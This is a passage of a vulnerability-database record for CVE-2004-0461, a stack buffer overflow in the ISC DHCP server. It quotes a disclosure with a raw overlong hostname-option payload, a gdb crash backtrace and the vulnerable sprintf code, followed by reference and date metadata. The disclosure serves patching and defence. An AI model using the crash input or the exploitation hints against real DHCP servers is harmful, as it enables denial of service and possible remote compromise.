\n92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X \n1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1. \n\nProgram received signal SIGSEGV, Segmentation fault. \n0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50, \nname=0x8149dac \"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", len=7, file=0x80bbe25 \"mdb.c\", line=1662)\n at hash.c:363\n363 hashno = (*table -\u003e do_hash) (name, len, table -\u003e \nhash_count);\n(gdb)\n \n\nbacktracing stack show:\n\n(gdb) bt\n#0 0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50, \nname=0x8149dac \"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", len=7, file=0x80bbe25 \"mdb.c\", line=1662)\n at hash.c:363\n#1 0x0806fb0a in lease_hash_lookup (ptr=0xbfffde24, table=0x38322d50, \nbuf=0x8149dac \"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", len=7, file=0x80bbe25 \"mdb.c\", line=1662)\n at mdb.c:2055\n#2 0x0806eb5b in find_lease_by_hw_addr (lp=0xbfffde24, hwaddr=0x8149dac \n\"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", hwlen=7, file=0x80bbe25 \"mdb.c\", line=1662)\n at mdb.c:1574\n#3 0x0806ee5f in hw_hash_add (lease=0x8149d30) at mdb.c:1661\n#4 0x0806d959 in supersede_lease (comp=0x8149d30, lease=0x811def8, \ncommit=1, propogate=1, pimmediate=1) at mdb.c:969\n#5 0x08050cb9 in ack_lease (packet=0x811d6e0, lease=0x8149d30, offer=5, \nwhen=0,\n msg=0xbfffdfd0 \"DHCPREQUEST for 192.168.0.99 from ff:ff:ff:ff:ff:ff \nvia eth0\", ms_nulltp=0) at dhcp.c:2227\n#6 0x0804d041 in dhcprequest (packet=0x811d6e0, ms_nulltp=0, \nip_lease=0x0) at dhcp.c:662\n#7 0x0804c37d in dhcp (packet=0x811d6e0) at dhcp.c:224\n#8 0x08088d9a in do_packet (interface=0x811d568, packet=0xbfffe580, \nlen=1430, from_port=17408, from=\n {len = 4, iabuf = \u0027\\0\u0027 \u003crepeats 15 times\u003e}, hfrom=0xbffff5b0) at \noptions.c:2237\n#9 0x08096718 in got_one (h=0x811d568) at discover.c:785\n#10 0x080a937e in omapi_one_dispatch (wo=0x0, t=0x0) at dispatch.c:418\n#11 0x0807cce3 in dispatch () at dispatch.c:103\n#12 0x0804add1 in main (argc=3, argv=0xbffff904, envp=0xbffff914) at \ndhcpd.c:614\n#13 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6\n(gdb)\n\nNote that the daemon may actually crash at a different location \ndepending of the first corrupted structure it meets and therefore,\nof the size of the malicious option sent, along with the context (type \nof packet, leases in use etc...)\n\n\nProblems in the source:\nI have spent quite some time to find out where the overflow actually \ntakes its roots, here are my findings:\n\nfile server/dhcp.c:\nfunction dhcprequest :\n\n char msgbuf [1024]; /* XXX */\n char *s;\n\n.... \n\n if (lease \u0026\u0026 lease -\u003e client_hostname \u0026\u0026\n db_printable (lease -\u003e client_hostname))\n s = lease -\u003e client_hostname;\n else\n s = (char *)0;\n\n\n...... \n\n sprintf (msgbuf, \"DHCPREQUEST for %s%s from %s %s%s%svia %s\",\n piaddr (cip), smbuf,\n (packet -\u003e raw -\u003e htype\n ? print_hw_addr (packet -\u003e raw -\u003e htype,\n packet -\u003e raw -\u003e hlen,\n packet -\u003e raw -\u003e chaddr)\n : (lease\n ? print_hex_1 (lease -\u003e uid_len, lease -\u003e uid,\n lease -\u003e uid_len)\n : \"\u003cno identifier\u003e\")),\n s ? \"(\" : \"\", s ? s : \"\", s ? \") \" : \"\",\n packet -\u003e raw -\u003e giaddr.s_addr\n ? inet_ntoa (packet -\u003e raw -\u003e giaddr)\n : packet -\u003e interface -\u003e name);\n\n\nTo summarize, s is referencing the reassembled hostname option passed to \nthe daemon, afterwhat it is used as is in sprintf and stored in msgbuf \n(fixed size) without any length checking. \nlocal msgbuf can obviously be overrun, corrupting various structures in \nstack and eventually causing the server to crash\nNote that the call to db_printable( ), filtering hostname, may render \nthe task harder to root a server but likely not impossible. \nAlso being able to corrupt structures like *lease or *oc may have \ninteresting side effects from an attacker perspective. \n\nvoid dhcprequest (packet, ms_nulltp, ip_lease)\n struct packet *packet;\n int ms_nulltp;\n struct lease *ip_lease;\n{\n struct lease *lease;\n struct iaddr cip;\n struct iaddr sip;\n struct subnet *subnet;\n int ours = 0;\n struct option_cache *oc;\n struct data_string data;\n int status;\n char msgbuf [1024]; /* XXX */\n char *s;\n char smbuf [19];\n\n.... \n\nthe very same problem is present in dhcpdiscover( ), dhcpdecline( ), \ndhcprequest( ) , dhcprelease( ), ... \nplease look at the diff in unified format, attached to this email, for a \ndetailed list",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0461"
},
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "PACKETSTORM",
"id": "52810"
},
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "PACKETSTORM",
"id": "33664"
}
],
"trust": 3.69
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#654390",
"trust": 3.5
},
{
"db": "USCERT",
"id": "TA04-174A",
"trust": 2.9
},
{
"db": "NVD",
"id": "CVE-2004-0461",
"trust": 2.8
},
{
"db": "BID",
"id": "10591",
"trust": 2.8
},
{
"db": "CERT/CC",
"id": "VU#317350",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "23265",
"trust": 1.8
},
{
"db": "XF",
"id": "16476",
"trust": 1.4
},
{
"db": "XF",
"id": "16475",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117",
"trust": 0.7
},
{
"db": "SUSE",
"id": "SUSE-SA:2004:019",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040708 [OPENPKG-SA-2004.031] OPENPKG SECURITY ADVISORY (DHCPD)",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040622 DHCP VULN // NO CODE 0DAY //",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040628 ISC DHCP OVERFLOWS",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "TA04-174A",
"trust": 0.6
},
{
"db": "MANDRAKE",
"id": "MDKSA-2004:061",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-8891",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "52810",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "33622",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "33664",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "PACKETSTORM",
"id": "52810"
},
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "PACKETSTORM",
"id": "33664"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
]
},
"id": "VAR-200408-0175",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-8891"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:32:30.726000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ISC Dynamic Host Configuration Protocol (DHCP)",
"trust": 0.8,
"url": "https://www.isc.org/sw/dhcp/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-174a.html"
},
{
"trust": 2.7,
"url": "http://www.kb.cert.org/vuls/id/654390"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/10591"
},
{
"trust": 1.8,
"url": "http://www.xerox.com/downloads/usa/en/c/cert_xrx06_004_v11.pdf"
},
{
"trust": 1.7,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2004:061"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/23265"
},
{
"trust": 1.7,
"url": "http://www.novell.com/linux/security/advisories/2004_19_dhcp_server.html"
},
{
"trust": 1.6,
"url": "about vulnerability notes"
},
{
"trust": 1.6,
"url": "contact us about this vulnerability"
},
{
"trust": 1.6,
"url": "provide a vendor statement"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/16476"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16476"
},
{
"trust": 1.0,
"url": "http://www.kb.cert.org/vuls/id/317350"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=108795911203342\u0026w=2"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=108843959502356\u0026w=2"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=108938625206063\u0026w=2"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-0461"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/16475"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta04-174a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta04-174a"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2004-0461"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108843959502356\u0026w=2"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108938625206063\u0026w=2"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108795911203342\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.mandrakesoft.com/security/advisories?name=mdksa-2004:061"
},
{
"trust": 0.3,
"url": "/archive/1/367286"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108795911203342\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108843959502356\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108938625206063\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://www.xerox.com/downloads/usa/en/c/cert_xrx06_006_v1b.pdf"
},
{
"trust": 0.1,
"url": "http://secunia.com/software_inspector/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/23265/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4746/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4553/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-174a.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.isc.org/sw/dhcp/"
},
{
"trust": 0.1,
"url": "http://www.isc.org/products/dhcp"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "PACKETSTORM",
"id": "52810"
},
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "PACKETSTORM",
"id": "33664"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "PACKETSTORM",
"id": "52810"
},
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "PACKETSTORM",
"id": "33664"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-06-22T00:00:00",
"db": "CERT/CC",
"id": "VU#317350"
},
{
"date": "2004-06-22T00:00:00",
"db": "CERT/CC",
"id": "VU#654390"
},
{
"date": "2004-08-06T00:00:00",
"db": "VULHUB",
"id": "VHN-8891"
},
{
"date": "2004-06-22T00:00:00",
"db": "BID",
"id": "10591"
},
{
"date": "2009-04-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"date": "2006-12-07T06:24:29",
"db": "PACKETSTORM",
"id": "52810"
},
{
"date": "2004-06-22T23:37:13",
"db": "PACKETSTORM",
"id": "33622"
},
{
"date": "2004-06-28T00:42:00",
"db": "PACKETSTORM",
"id": "33664"
},
{
"date": "2004-08-06T04:00:00",
"db": "NVD",
"id": "CVE-2004-0461"
},
{
"date": "2004-06-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-07-13T00:00:00",
"db": "CERT/CC",
"id": "VU#317350"
},
{
"date": "2004-07-21T00:00:00",
"db": "CERT/CC",
"id": "VU#654390"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-8891"
},
{
"date": "2009-07-12T05:16:00",
"db": "BID",
"id": "10591"
},
{
"date": "2009-04-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"date": "2017-07-11T01:30:10.747000",
"db": "NVD",
"id": "CVE-2004-0461"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ISC DHCP contains a stack buffer overflow vulnerability in handling log lines containing ASCII characters only",
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "10591"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
],
"trust": 0.9
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.